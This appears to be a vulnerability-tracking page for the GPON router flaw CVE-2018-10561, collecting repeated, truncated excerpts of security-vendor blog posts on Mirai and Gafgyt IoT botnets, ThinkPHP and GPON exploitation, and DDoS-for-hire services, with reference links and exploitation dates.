ThinkPHP Vulnerability Abused by Botnets
IoT
## ThinkPHP Vulnerability Abused by Botnets
We found a new Mirai variant we’ve called Yowai and Gafgyt variant Hakai abusing a ThinkPHP flaw for propagation and DDoS attacks.
By: Augusto Remillano II 2019/01/25 Read time: ( words)
Save to Folio
Cybercriminals are exploiting a ThinkPHP vulnerability — one that was disclosed and patched in December 2018 — for botnet propagation by a new Mirai variant we’ve called Yowai and Gafgyt variant Hakai. Cybercriminals use websites created using the PHP framework to breach web servers via dictionary attacks on default credentials and gain control of these routers for distributed denial of service attacks ( DDoS ). Our telemetry showed that these two particular malware types caused a sudden increase in attacks and infection attempts from Janua
Trendmicro
ThinkPHP Vulnerability Abused by Botnets
blogs_trendmicro·2019-01-25
ThinkPHP Vulnerability Abused by Botnets
IoT
# ThinkPHP Vulnerability Abused by Botnets
We found a new Mirai variant we’ve called Yowai and Gafgyt variant Hakai abusing a ThinkPHP flaw for propagation and DDoS attacks.
By: Augusto Remillano II
Jan 25, 2019
Read time: ( words)
Save to Folio
Cybercriminals are exploiting a ThinkPHP vulnerability — one that was disclosed and patched in December 2018 — for botnet propagation by a new Mirai variant we’ve called Yowai and Gafgyt variant Hakai. Cybercriminals use websites created using the PHP framework to breach web servers via dictionary attacks on default credentials and gain control of these routers for distributed denial of service attacks (DDoS). Our telemetry showed that these two particular malware types caused a sudden increase in attacks and infection attempts from Janua
Trendmicro
ThinkPHP Vulnerability Abused by Botnets
blogs_trendmicro·2019-01-25
ThinkPHP Vulnerability Abused by Botnets
IoT
# ThinkPHP Vulnerability Abused by Botnets
We found a new Mirai variant we’ve called Yowai and Gafgyt variant Hakai abusing a ThinkPHP flaw for propagation and DDoS attacks.
By: Augusto Remillano II
2019/01/25
Read time: ( words)
Save to Folio
Cybercriminals are exploiting a ThinkPHP vulnerability — one that was disclosed and patched in December 2018 — for botnet propagation by a new Mirai variant we’ve called Yowai and Gafgyt variant Hakai. Cybercriminals use websites created using the PHP framework to breach web servers via dictionary attacks on default credentials and gain control of these routers for distributed denial of service attacks (DDoS). Our telemetry showed that these two particular malware types caused a sudden increase in attacks and infection attempts from January
Trendmicro
ThinkPHP Vulnerability Abused by Botnets
blogs_trendmicro·2019-01-25
ThinkPHP Vulnerability Abused by Botnets
IoT
## ThinkPHP Vulnerability Abused by Botnets
We found a new Mirai variant we’ve called Yowai and Gafgyt variant Hakai abusing a ThinkPHP flaw for propagation and DDoS attacks.
By: Augusto Remillano II Jan 25, 2019 Read time: ( words)
Save to Folio
Cybercriminals are exploiting a ThinkPHP vulnerability — one that was disclosed and patched in December 2018 — for botnet propagation by a new Mirai variant we’ve called Yowai and Gafgyt variant Hakai. Cybercriminals use websites created using the PHP framework to breach web servers via dictionary attacks on default credentials and gain control of these routers for distributed denial of service attacks ( DDoS ). Our telemetry showed that these two particular malware types caused a sudden increase in attacks and infection attempts from Jan
Fortinet
DDoS-for-Hire Service Powered by Bushido Botnet
blogs_fortinet·2018-10-26
DDoS-for-Hire Service Powered by Bushido Botnet
FORTIGUARD LABS THREAT RESEARCH
DDoS-for-Hire Service Powered by Bushido Botnet
By Rommel Joven and Evgeny Ananin | October 26, 2018
Distributed Denial-of-Service (DDoS) service offerings, often disguised as legitimate “booter” or “stresser” services, continue to increase in the cyber underground market. This relatively new Crime-as-a-Service trend has created an entry point for novice DDoS attackers, offering a simple option to anonymously attack nearly any website and forcing it offline for a small fee.
Sadly, due to the public release of the source code of some popular bots, building a botnet to provide these services is simpler than ever. A quick Google search returns lists of resources for botnet builders, usually with complete step-by-step instructions. Being able to re-use and ev
Securelist
New trends in the world of IoT threats
blogs_securelist·2018-09-18
New trends in the world of IoT threats
Authors
Mikhail Kuzin
Yaroslav Shmelev
Vladimir Kuskov
Cybercriminals’ interest in IoT devices continues to grow: in H1 2018 we picked up three times as many malware samples attacking smart devices as in the whole of 2017. And in 2017 there were ten times more than in 2016. That doesn’t bode well for the years ahead.
We decided to study what attack vectors are deployed by cybercriminals to infect smart devices, what malware is loaded into the system, and what it means for device owners and victims of freshly armed botnets.
Number of malware samples for IoT devices in Kaspersky Lab’s collection, 2016-2018.
One of the most popular attack and infection vectors against devices remains cracking Telnet passwords. In Q2 2018, there were three times as many such attacks against our honeypot
Securelist
New trends in the world of IoT threats
blogs_securelist·2018-09-18
New trends in the world of IoT threats
Authors
- Mikhail Kuzin
- Yaroslav Shmelev
- Vladimir Kuskov
Cybercriminals’ interest in IoT devices continues to grow: in H1 2018 we picked up three times as many malware samples attacking smart devices as in the whole of 2017. And in 2017 there were ten times more than in 2016. That doesn’t bode well for the years ahead.
We decided to study what attack vectors are deployed by cybercriminals to infect smart devices, what malware is loaded into the system, and what it means for device owners and victims of freshly armed botnets.
Number of malware samples for IoT devices in Kaspersky Lab’s collection, 2016-2018.
One of the most popular attack and infection vectors against devices remains cracking Telnet passwords. In Q2 2018, there were three times as many such attacks against our hone
Unit42
Multi-exploit IoT/Linux Botnets Mirai and Gafgyt Target Apache Struts, SonicWall
blogs_unit42·2018-09-10·CVSS 9.8
CVE-2017-5638 [CRITICAL] Multi-exploit IoT/Linux Botnets Mirai and Gafgyt Target Apache Struts, SonicWall
Threat Research Center
Threat Research
Malware
## Multi-exploit IoT/Linux Botnets Mirai and Gafgyt Target Apache Struts, SonicWall
Ruchna Nigam
Published: September 9, 2018
Malware
Threat Research
Vulnerabilities
Apache Struts
BlackNurse
Botnet
CVE-2017-5638
CVE-2018-9866
Exploits
Gafgyt
IoT
Linux
Mirai
SonicWall RCE
Executive Summary:
Unit 42 has uncovered new variants of the well-known IoT botnets Mirai and Gafgyt. These are the IoT botnets associated with unprecedented Distributed Denial of Service attacks in November 2016 and since.
These variants are notable for two reasons:
The new Mirai version targets the same Apache Struts vulnerability associated with the Equifax data breach in 2017.
The new Gafgyt version targets a newly disclosed vulnerability affectin
Unit42
Multi-exploit IoT/Linux Botnets Mirai and Gafgyt Target Apache Struts, SonicWall
blogs_unit42·2018-09-10·CVSS 9.8
[CRITICAL] Multi-exploit IoT/Linux Botnets Mirai and Gafgyt Target Apache Struts, SonicWall
Executive Summary:
Unit 42 has uncovered new variants of the well-known IoT botnets Mirai and Gafgyt. These are the IoT botnets associated with unprecedented Distributed Denial of Service attacks in November 2016 and since.
These variants are notable for two reasons:
- The new Mirai version targets the same Apache Struts vulnerability associated with the Equifax data breach in 2017.
- The new Gafgyt version targets a newly disclosed vulnerability affecting older, unsupported versions of SonicWall’s Global Management System (GMS).
These developments suggest these IOT botnets are increasingly targeting enterprise devices with outdated versions.
All organizations should ensure they keep not only their systems up-to-date and patched, but also their IoT devices. For Palo Alto Networks cust
Unit42
Unit 42 Finds New Mirai and Gafgyt IoT/Linux Botnet Campaigns
blogs_unit42·2018-07-20·CVSS 9.8
[CRITICAL] Unit 42 Finds New Mirai and Gafgyt IoT/Linux Botnet Campaigns
The end of May 2018 has marked the emergence of three malware campaigns built on publicly available source code for the Mirai and Gafgyt malware families that incorporate multiple known exploits affecting Internet of Things (IoT) devices.
Samples belonging to these campaigns incorporate as many as eleven exploits within a single sample, beating the IoT Reaper malware, which borrowed some of the Mirai source code but also came with an integrated LUA environment that incorporated nine exploits in its code.
In their newest evolution, samples also target the D-Link DSL-2750B OS Command Injection vulnerability, only a few weeks after the publication of its Metasploit module on the 25th of May (even though the vulnerability has been public knowledge since February of 2016).
While exploring sa
Unit42
Unit 42 Finds New Mirai and Gafgyt IoT/Linux Botnet Campaigns
blogs_unit42·2018-07-20·CVSS 9.8
[CRITICAL] Unit 42 Finds New Mirai and Gafgyt IoT/Linux Botnet Campaigns
Threat Research Center
Threat Research
Malware
## Unit 42 Finds New Mirai and Gafgyt IoT/Linux Botnet Campaigns
Ruchna Nigam
Published: July 20, 2018
Malware
Threat Research
Botnet
DDoS
Exploits
Gafgyt
Hakai
IoT
Linux
Mirai
Okane
Omni
The end of May 2018 has marked the emergence of three malware campaigns built on publicly available source code for the Mirai and Gafgyt malware families that incorporate multiple known exploits affecting Internet of Things (IoT) devices.
Samples belonging to these campaigns incorporate as many as eleven exploits within a single sample, beating the IoT Reaper malware, which borrowed some of the Mirai source code but also came with an integrated LUA environment that incorporated nine exploits in its code.
In their newest evolution, samples
Trendmicro
GPON Bugs Exploited for Mirai-like Scanning Activities
blogs_trendmicro·2018-05-21·CVSS 9.8
CVE-2018-10561 [CRITICAL] GPON Bugs Exploited for Mirai-like Scanning Activities
Exploits & Vulnerabilities
## GPON Bugs Exploited for Mirai-like Scanning Activities
We recently found similar Mirai-like scanning activity from Mexico with some being done via the exploitation of CVE-2018-10561 and CVE-2018-10562, two vulnerabilities that are specific to Gigabit Passive Optical Network (GPON)-based home routers.
By: IoT Reputation Service Team, Smart Home Network Team 2018/05/21 Read time: ( words)
Save to Folio
In April, we discussed our findings on increased activity originating from China targeting network devices in Brazil that mimicked the Mirai botnet’s scanning technique. We recently found similar Mirai-like scanning activity from Mexico. The difference in these attacks, however, is that some of the detected activity is being done via the exploitation of CVE-2
Trendmicro
GPON Bugs Exploited for Mirai-like Scanning Activities
blogs_trendmicro·2018-05-21·CVSS 9.8
CVE-2018-10561 [CRITICAL] GPON Bugs Exploited for Mirai-like Scanning Activities
Exploits & Vulnerabilities
## GPON Bugs Exploited for Mirai-like Scanning Activities
We recently found similar Mirai-like scanning activity from Mexico with some being done via the exploitation of CVE-2018-10561 and CVE-2018-10562, two vulnerabilities that are specific to Gigabit Passive Optical Network (GPON)-based home routers.
By: IoT Reputation Service Team, Smart Home Network Team May 21, 2018 Read time: ( words)
Save to Folio
In April, we discussed our findings on increased activity originating from China targeting network devices in Brazil that mimicked the Mirai botnet’s scanning technique. We recently found similar Mirai-like scanning activity from Mexico. The difference in these attacks, however, is that some of the detected activity is being done via the exploitation of CVE
Trendmicro
GPON Bugs Exploited for Mirai-like Scanning Activities
blogs_trendmicro·2018-05-21·CVSS 9.8
CVE-2018-10561 [CRITICAL] GPON Bugs Exploited for Mirai-like Scanning Activities
Exploits & Vulnerabilities
# GPON Bugs Exploited for Mirai-like Scanning Activities
We recently found similar Mirai-like scanning activity from Mexico with some being done via the exploitation of CVE-2018-10561 and CVE-2018-10562, two vulnerabilities that are specific to Gigabit Passive Optical Network (GPON)-based home routers.
By: IoT Reputation Service Team, Smart Home Network Team
2018/05/21
Read time: ( words)
Save to Folio
In April, we discussed our findings on increased activity originating from China targeting network devices in Brazil that mimicked the Mirai botnet’s scanning technique. We recently found similar Mirai-like scanning activity from Mexico. The difference in these attacks, however, is that some of the detected activity is being done via the exploitation of CVE-2
Trendmicro
GPON Bugs Exploited for Mirai-like Scanning Activities
blogs_trendmicro·2018-05-21·CVSS 9.8
CVE-2018-10561 [CRITICAL] GPON Bugs Exploited for Mirai-like Scanning Activities
Exploits y vulnerabilidades
## GPON Bugs Exploited for Mirai-like Scanning Activities
We recently found similar Mirai-like scanning activity from Mexico with some being done via the exploitation of CVE-2018-10561 and CVE-2018-10562, two vulnerabilities that are specific to Gigabit Passive Optical Network (GPON)-based home routers.
By: IoT Reputation Service Team, Smart Home Network Team May 21, 2018 Read time: ( words)
Save to Folio
In April, we discussed our findings on increased activity originating from China targeting network devices in Brazil that mimicked the Mirai botnet’s scanning technique. We recently found similar Mirai-like scanning activity from Mexico. The difference in these attacks, however, is that some of the detected activity is being done via the exploitation of CV
Trendmicro
GPON Bugs Exploited for Mirai-like Scanning Activities
blogs_trendmicro·2018-05-21·CVSS 9.8
CVE-2018-10561 [CRITICAL] GPON Bugs Exploited for Mirai-like Scanning Activities
Ausnutzung von Schwachstellen
## GPON Bugs Exploited for Mirai-like Scanning Activities
We recently found similar Mirai-like scanning activity from Mexico with some being done via the exploitation of CVE-2018-10561 and CVE-2018-10562, two vulnerabilities that are specific to Gigabit Passive Optical Network (GPON)-based home routers.
By: IoT Reputation Service Team, Smart Home Network Team May 21, 2018 Read time: ( words)
Save to Folio
In April, we discussed our findings on increased activity originating from China targeting network devices in Brazil that mimicked the Mirai botnet’s scanning technique. We recently found similar Mirai-like scanning activity from Mexico. The difference in these attacks, however, is that some of the detected activity is being done via the exploitation of
Fortinet
A Wicked Family of Bots
blogs_fortinet·2018-05-17
A Wicked Family of Bots
FORTIGUARD LABS THREAT RESEARCH
A Wicked Family of Bots
By Rommel Joven and Kenny Yang | May 17, 2018
As we continue to keep track of the latest IoT botnets, the FortiGuard Labs team has seen an increasing number of Mirai variants, thanks to the source code being made public two years ago. Since then, threat actors have been adding their own flavours to the original recipe.
Some made significant modifications, such as adding the capability to turn infected devices into swarms of malware proxies and cryptominers. Others integrated Mirai code with multiple exploits targeting both known and unknown vulnerabilities, similar to a new variant recently discovered by FortiGuard Labs, which we now call WICKED.
This new variant has added at least three exploits to its arsenal to target unpatched
Qualys
Timely Password-Change Call from Twitter, as Bugs Hit WebEx and GPON routers | Qualys
blogs_qualys·2018-05-08
Timely Password-Change Call from Twitter, as Bugs Hit WebEx and GPON routers | Qualys
The cyber security news cycle is always active, so to help you stay in the loop here’s a selection of incidents that caught our attention over the past week or so involving, among others, Twitter, Cisco and GPON routers.
### Twitter picks a good day for password-change call
As “change your password” calls from vendors go, the one from Twitter last week ranks right up there, and not just because of the scope of users involved. As Jon Swartz pointed out in Barron’s, Twitter’s alert went out on Thursday, which happened to be World Password Day.
The social media juggernaut reached out to all of its 330 million users and advised them to take a moment, go to their account settings page and enter a new password. Twitter also suggested they enable Twitter’s two-step verification feature, a move
Qualys
Timely Password-Change Call from Twitter, as Bugs Hit WebEx and GPON routers
blogs_qualys·2018-05-08
Timely Password-Change Call from Twitter, as Bugs Hit WebEx and GPON routers
The cyber security news cycle is always active, so to help you stay in the loop here’s a selection of incidents that caught our attention over the past week or so involving, among others, Twitter, Cisco and GPON routers.
## Twitter picks a good day for password-change call
As “change your password” calls from vendors go, the one from Twitter last week ranks right up there, and not just because of the scope of users involved. As Jon Swartz pointed out in Barron’s, Twitter’s alert went out on Thursday, which happened to be World Password Day .
The social media juggernaut reached out to all of its 330 million users and advised them to take a moment, go to their account settings page and enter a new password. Twitter also suggested they enable Twitter’s two-step verification feature, a move
Greynoiseio
Battling Ransomware One Tag At A Time
blogs_greynoiseio
Battling Ransomware One Tag At A Time
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Greynoiseio
NoiseLetter
blogs_greynoiseio
NoiseLetter
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Greynoiseio
GreyNoise Intelligence Publishes Second Annual Retrospective to Help International Cybersecurity Community Defend Against Internet Exploitation
blogs_greynoiseio
GreyNoise Intelligence Publishes Second Annual Retrospective to Help International Cybersecurity Community Defend Against Internet Exploitation
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
http://www.securityfocus.com/bid/107053https://www.exploit-db.com/exploits/44576/https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/http://www.securityfocus.com/bid/107053https://www.exploit-db.com/exploits/44576/https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2018-10561
2018-05-04
Published
2022-03-31
Added to CISA KEV
Exploited in the wild